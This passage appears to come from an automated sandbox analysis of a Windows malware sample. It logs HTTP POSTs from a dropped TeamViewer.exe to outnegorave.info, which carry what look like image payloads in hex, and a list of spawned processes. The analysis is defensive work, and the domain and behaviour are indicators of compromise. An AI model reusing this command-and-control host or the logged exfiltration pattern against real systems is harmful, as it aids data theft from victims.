                                                                                                                                    2021-09-15 11:52:07 UTC695OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:07 UTC711OUTData Raw: 30 fa d2 1b 77 1f 7b 03 f1 ad 39 74 fb e3 cb 65 bf 1a ac f6 77 09 d6 26 ad a3 51 3e a6 12 52 5d 0a be 47 ab 0a 5f 25 47 56 a9 5a 29 17 aa 91 f8 53 76 91 d4 56 89 a3 36 d8 df 2d 07 a9 a5 c2 8f e1 14 52 d3 b0 ae c3 23 b0 02 97 27 d6 92 96 8b 12 1c fa d2 8a 4a 5a 04 2d 14 51 48 05 14 a2 92 94 52 64 b1 c2 b4 6c b1 91 8a ce 15 7e c8 f2 2b 1a ab dd 36 c3 bf 7c eb 54 e3 4d 27 fd 9a f3 eb bf f5 8d f5 ae f7 38 d2 58 ff 00 b3 5c 05 d1 fd e3 7d 6b 97 01 bc 8f 4f 30 7f 01 d4 5b 7f c8 ab 1f f9 ef 59 0f 5a d0 1f f8 a5 22 ff 00 3d eb 19 d8 e6 aa 82 d6 5e a6 18 c7 a4 7d 06 31 23 a1 a0 3b 0e 8c 69 33 9a 4a eb b1 e6 73 32 41 3b 8e f9 a7 79 e0 fd e4 06 a1 a2 97 2a 29 4d a2 53 e4 37 de 4c 52 1b 68 1b a1 c5 47 45 16 7d 18 d5 57 d4 1b 4f 53 f7 58 54 4d a7 c8 3a 73 53 64 f5 06
                                                                                                                                    Data Ascii: 0w{9tew&Q>R]G_%GVZ)SvV6-R#'JZ-QHRdl~+6|TM'8X\}kO0[YZ"=^}1#;i3Js2A;y*)MS7LRhGE}WOSXTM:sSd
                                                                                                                                    2021-09-15 11:52:07 UTC727OUTData Raw: 80 16 81 49 46 69 88 75 14 94 b4 c0 28 a2 96 81 05 2d 14 62 98 85 a5 a4 a2 98 80 d2 8a 4a 51 40 0a 29 29 45 21 a6 20 a5 a4 a0 52 01 c2 9c 29 b4 b5 48 4c 5a 29 29 69 80 b4 51 45 04 8b 45 14 53 00 a2 8a 28 10 e1 4b 4d 14 a2 9a 01 69 69 29 69 92 14 b4 94 a2 98 0b 45 14 53 10 b4 52 52 d0 20 a5 a4 a5 a6 80 75 14 82 96 99 21 4a 28 a2 98 0b 45 02 96 98 84 a4 a5 a2 80 10 75 a7 d3 07 5a 7d 08 18 50 68 a2 99 20 29 69 05 3b 14 20 62 81 4e a6 d3 85 52 25 89 de 96 90 f5 a7 0a 60 20 a7 53 69 45 31 31 68 a2 8a 04 02 96 90 53 a9 88 4a 75 25 14 c1 8e a5 a6 8a 5a 64 8e cd 28 a6 d2 8a 68 4c 70 a5 a6 d3 85 32 58 52 d2 51 4c 42 d1 49 4b 40 05 2d 25 2d 00 2d 2d 36 9d 40 98 52 8a 4a 5a 04 2d 14 94 b4 08 29 68 a2 98 05 28 a2 94 50 26 2d 02 92 94 50 23 43 49 1f bf 73 e8 86 ab 1e
                                                                                                                                    Data Ascii: IFiu(-bJQ@))E! R)HLZ))iQEES(KMii)iESRR u!J(EuZ}Ph )i; bNR%` SiE11hSJu%Zd(hLp2XRQLBIK@-%---6@RJZ-)h(P&-P#CIs
                                                                                                                                    2021-09-15 11:52:07 UTC743OUTData Raw: 69 69 b4 b4 08 70 a2 92 96 a8 42 8a 5a 6e 69 69 88 76 69 69 b4 b4 08 70 a5 14 da 50 6a 93 25 92 0a 29 01 a2 a9 12 2d 2d 25 19 a6 16 17 34 66 90 52 d1 71 58 51 4b 9a 65 2e 69 dc 2c 3f 34 b4 cc d2 e6 99 36 1c 29 73 4d cd 14 ee 16 1f 9a 33 4d cd 1b bd a8 b8 ac 48 0d 2e 6a 3d c7 d6 8c fb d3 b8 ac 49 91 46 6a 3c d2 e6 8b 8a c3 f3 46 69 b9 a3 34 ee 16 1d 4b 9a 6d 19 a2 e2 b0 ec d2 e6 99 9a 33 4e e1 61 f9 a3 34 cd d4 9b a8 b8 72 92 66 8c d4 7b a8 dd 4a e1 ca 49 ba 93 75 44 5e 9a 5e 87 21 a8 13 16 a6 97 a8 8b d3 4b 54 b9 94 a0 4a 5e 98 5e a3 2d 4c 2d 50 e4 5a 81 21 7f 7a 61 6a 61 6a 61 6a 87 23 45 11 e5 a9 85 a9 a5 a9 85 ab 37 23 45 11 c4 d3 09 a4 26 92 a1 b2 d2 14 9a 4a 4a 33 49 8e c2 1a 28 34 da 92 90 66 8a 4a 4a 57 1d 8a 18 ef 4b 49 45 72 9d 62 d1 45 18 a0 02
                                                                                                                                    Data Ascii: iipBZniiviipPj%)--%4fRqXQKe.i,?46)sM3MH.j=IFj<Fi4Km3Na4rf{JIuD^^!KTJ^^-L-PZ!zajajaj#E7#E&JJ3I(4fJJWKIErbE
                                                                                                                                    2021-09-15 11:52:07 UTC759OUTData Raw: 55 cf 6b ff 00 0d 75 0b 3d d3 69 12 7d b6 11 cf 96 d8 59 47 f4 6f d3 e9 4c f1 07 c3 8d 46 c3 74 da 53 1b e8 07 3b 00 c4 aa 3e 9f c5 f8 73 ed 5d 07 84 7c 0d a1 9b 58 ef ae 65 fe d1 90 f5 46 5d a9 1b 77 52 9d 72 3b 86 fc a9 01 e5 73 45 24 12 b4 53 c6 f1 c8 87 0c 8e a4 10 7d c1 a6 57 47 f1 09 12 3f 1a df a4 6a a8 8a 22 01 54 60 01 e5 25 73 95 42 0a b7 a6 d9 35 f5 d0 8c 1d a8 39 76 f4 15 52 ba 0f 0b ed c5 c8 3d 7e 5f cb 9a 99 3b 2d 08 a9 51 53 5c ed 5e c6 e5 9e 8d 6e 13 65 b5 98 93 68 e4 94 dc 7f 1a af a8 78 70 5c 2b 08 ed 5a 19 87 42 a8 47 e6 2b 74 6f fe cd b7 11 64 c6 33 bf 1f df cf 7f c3 15 b7 a6 f9 bf 61 4f 3f 3b b2 76 ee eb b7 b7 f5 ac 31 34 a5 43 0e b1 0a 5a f6 3d 18 63 a9 d6 9f b2 8c 3d d3 c5 a6 89 e0 99 e2 95 4a ba 12 ac 0f 63 4c ad af 18 f9 7f f0 94
                                                                                                                                    Data Ascii: Uku=i}YGoLFtS;>s]|XeF]wRr;sE$S}WG?j"T`%sB59vR=~_;-QS\^nehxp\+ZBG+tod3aO?;v14CZ=c=JcL
                                                                                                                                    2021-09-15 11:52:07 UTC762OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 31 31 32 35 37 37 32 32 30 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1112577220--
                                                                                                                                    2021-09-15 11:52:08 UTC762INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:08 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=e5f1721d771ebb63b828c57eaf3aa838382a6112d35f7fdeb0e8b473433b80ca; expires=Thu, 15-Sep-2022 11:52:07 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Uz4kOaDXyL7s%2Bq5p5LXzdEhmXf5nBILqaQKKygUP%2BVKInrV85Shc6KgQDKj%2BUzD2hwR2PVEA6odDTZwM86UeF%2F%2BrUoMvHDnl1GqniaTIAEht%2FlUd8kju8EsoB6sCelM98cAm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5a62eb1691b-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:08 UTC763INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    9192.168.2.549770172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:08 UTC763OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85017
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3839284298
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:08 UTC763OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 33 39 32 38 34 32 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3839284298Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:08 UTC763OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 96 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:08 UTC763OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:08 UTC779OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:08 UTC795OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:08 UTC811OUTData Raw: 01 45 14 50 01 45 14 50 02 d2 51 4b 40 05 14 51 40 0b 40 a4 a3 34 c4 3a 8a 4a 5a 60 14 51 4b 40 82 96 8a 31 4c 42 d2 d2 51 4c 40 69 45 25 28 a0 05 14 94 a2 90 d3 10 52 d2 50 29 00 e1 4e 14 da 5a a4 26 2d 14 94 b4 c0 5a 28 a2 82 45 a2 8a 29 80 51 45 14 08 70 a5 a6 8a 51 4d 00 b4 b4 94 b4 c9 0a 5a 4a 51 4c 05 a2 8a 29 88 5a 29 29 68 10 52 d2 52 d3 40 3a 8a 41 4b 4c 90 a5 14 51 4c 05 a2 81 4b 4c 42 52 52 d1 40 08 3a d3 e9 83 ad 3e 84 0c 28 34 51 4c 90 14 b4 82 9d 8a 10 31 40 a7 53 69 c2 a9 12 c4 ef 4b 48 7a d3 85 30 10 53 a9 b4 a2 98 98 b4 51 45 02 01 4b 48 29 d4 c4 25 3a 92 8a 60 c7 52 d3 45 2d 32 47 66 94 53 69 45 34 26 38 52 d3 69 c2 99 2c 29 69 28 a6 21 68 a4 a5 a0 02 96 92 96 80 16 96 9b 4e a0 4c 29 45 25 2d 02 16 8a 4a 5a 04 14 b4 51 4c 02 94 51 4a 28
                                                                                                                                    Data Ascii: EPEPQK@Q@@4:JZ`QK@1LBQL@iE%(RP)NZ&-Z(E)QEpQMZJQL)Z))hRR@:AKLQLKLBRR@:>(4QL1@SiKHz0SQEKH)%:`RE-2GfSiE4&8Ri,)i(!hNL)E%-JZQLQJ(
                                                                                                                                    2021-09-15 11:52:08 UTC827OUTData Raw: 4a 5a 62 0a 29 29 69 80 b4 b4 da 5a 04 38 51 49 4b 54 21 45 2d 37 34 b4 c4 3b 34 b4 da 5a 04 38 52 8a 6d 28 35 49 92 c9 05 14 80 d1 54 89 16 96 92 8c d3 0b 0b 9a 33 48 29 68 b8 ac 28 a5 cd 32 97 34 ee 16 1f 9a 5a 66 69 73 4c 9b 0e 14 b9 a6 e6 8a 77 0b 0f cd 19 a6 e6 8d de d4 5c 56 24 06 97 35 1e e3 eb 46 7d e9 dc 56 24 c8 a3 35 1e 69 73 45 c5 61 f9 a3 34 dc d1 9a 77 0b 0e a5 cd 36 8c d1 71 58 76 69 73 4c cd 19 a7 70 b0 fc d1 9a 66 ea 4d d4 5c 39 49 33 46 6a 3d d4 6e a5 70 e5 24 dd 49 ba a2 2f 4d 2f 43 90 d4 09 8b 53 4b d4 45 e9 a5 aa 5c ca 50 25 2f 4c 2f 51 96 a6 16 a8 72 2d 40 90 bf bd 30 b5 30 b5 30 b5 43 91 a2 88 f2 d4 c2 d4 d2 d4 c2 d5 9b 91 a2 88 e2 69 84 d2 13 49 50 d9 69 0a 4d 25 25 19 a4 c7 61 0d 14 1a 6d 49 48 33 45 25 25 2b 8e c5 0c 77 a5 a4 a2
                                                                                                                                    Data Ascii: JZb))iZ8QIKT!E-74;4Z8Rm(5IT3H)h(24ZfisLw\V$5F}V$5isEa4w6qXvisLpfM\9I3Fj=np$I/M/CSKE\P%/L/Qr-@000CiIPiM%%amIH3E%%+w
                                                                                                                                    2021-09-15 11:52:08 UTC843OUTData Raw: 6f ed 49 a4 bb 9d d7 19 46 28 a9 f4 c7 24 fd 7f 2a e7 b5 ff 00 86 ba 85 9e e9 b4 89 3e db 08 e7 cb 6c 2c a3 fa 37 e9 f4 a6 78 83 e1 c6 a3 61 ba 6d 29 8d f4 03 9d 80 62 55 1f 4f e2 fc 39 f6 ae 83 c2 3e 06 d0 cd ac 77 d7 32 ff 00 68 c8 7a a3 2e d4 8d bb a9 4e b9 1d c3 7e 54 80 f2 b9 a2 92 09 5a 29 e3 78 e4 43 86 47 52 08 3e e0 d3 2b a3 f8 84 89 1f 8d 6f d2 35 54 45 11 00 aa 30 00 f2 92 b9 ca a1 05 5b d3 6c 9a fa e8 46 0e d4 1c bb 7a 0a a9 5d 07 85 f6 e2 e4 1e bf 2f e5 cd 4c 9d 96 84 54 a8 a9 ae 76 af 63 72 cf 46 b7 09 b2 da cc 49 b4 72 4a 6e 3f 8d 57 d4 3c 38 2e 15 84 76 ad 0c c3 a1 54 23 f3 15 ba 37 ff 00 66 db 88 b2 63 19 df 8f ef e7 bf e1 8a db d3 7c df b0 a7 9f 9d d9 3b 77 75 db db fa d6 18 9a 52 a1 87 58 85 2d 7b 1e 8c 31 d4 eb 4f d9 46 1e e9 e2 d3 44
                                                                                                                                    Data Ascii: oIF($*>l,7xam)bUO9>w2hz.N~TZ)xCGR>+o5TE0[lFz]/LTvcrFIrJn?W<8.vT#7fc|;wuRX-{1OFD
                                                                                                                                    2021-09-15 11:52:08 UTC846OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 38 33 39 32 38 34 32 39 38 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3839284298--
                                                                                                                                    2021-09-15 11:52:09 UTC846INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:09 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=ef5d3d7a7aee2c9a7fa6c79d2bb1535bff75bb04da22ac1e3f3e7e214a19aef6; expires=Thu, 15-Sep-2022 11:52:08 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Nfbncy1fCaWjTonuebiX85LFAnnCpgFc7OZQGsK45jyzTmubq%2BWcpf9cNjzQTipzA3WpR6kFIUGSEhqsH5knh9M2AQEgcTKS82b1XHjvGNvLkCIO6Wy3mSVmkB3MklzBGFll"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5aebb734a6d-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:09 UTC847INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Code Manipulations

                                                                                                                                    Statistics

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    Analysis Process: 77Etc0bR2v.exe PID: 5292 Parent PID: 1688

                                                                                                                                    General

                                                                                                                                    Start time:13:51:03
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\Desktop\77Etc0bR2v.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Users\user\Desktop\77Etc0bR2v.exe'
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:1828192 bytes
                                                                                                                                    MD5 hash:E71E3B995477081569ED357E4D403666
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low

                                                                                                                                    Analysis Process: TeamViewer.exe PID: 2512 Parent PID: 5292

                                                                                                                                    General

                                                                                                                                    Start time:13:51:06
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:'C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe' f
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 0%, Metadefender, Browse
                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                    Reputation:low

                                                                                                                                    Analysis Process: svchost.exe PID: 5568 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:11
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Analysis Process: TeamViewer.exe PID: 1264 Parent PID: 4832

                                                                                                                                    General

                                                                                                                                    Start time:13:51:13
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:4375848 bytes
                                                                                                                                    MD5 hash:EBDBA07BFABCF24F5D79EF27247EA643
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low

                                                                                                                                    Analysis Process: svchost.exe PID: 2176 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:12
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Analysis Process: svchost.exe PID: 5316 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:21
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:c:\windows\syswow64\svchost.exe -k 'usbportsmanagergrp' -svcr 'teamviewer.exe' -s USBManager
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:44520 bytes
                                                                                                                                    MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Analysis Process: svchost.exe PID: 3900 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:21
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                    Imagebase:0x230000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Analysis Process: svchost.exe PID: 3488 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:22
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
                                                                                                                                    MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Analysis Process: svchost.exe PID: 1112 Parent PID: 556

                                                                                                                                    General

                                                                                                                                    Start time:13:51:23
                                                                                                                                    Start date:15/09/2021
                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                                                                    Imagebase:0x7ff797770000
                                                                                                                                    File size:51288 bytes
